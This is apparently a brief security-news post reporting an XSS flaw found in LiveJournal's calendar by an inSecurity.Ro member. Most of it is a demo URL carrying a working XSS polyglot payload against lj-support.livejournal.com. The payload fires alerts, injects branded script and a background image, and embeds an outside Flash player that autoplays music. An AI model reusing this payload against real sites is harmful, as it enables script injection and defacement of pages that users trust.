After interesting XSS find , Hacker sony(inSecurity.Ro Team) come with more interesting XSS find; This time he discovered XSS vulnerability in LiveJournal official website.
LiveJournal is a vibrant global social media platform where users share common passions and interests. Hacker claimed he found XSS in the calendar of Livejournal.com and it took only 5 minutes to discover security flaw.
Demo:
http://lj-support.livejournal.com/2012/02/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/peo/det/dety38.jpg%22%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Presents:Cross%20Site%20Scripting%20-Don%27t%20Cry..create%20by%20Sony%22%29%3C/script%3E%20%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=http://www.audiopoisk.com/files/no/guns-n-roses---guns-n-roses---13---dont-cry-398865.mp3&autostart=yes%22%3E%3C/object%3E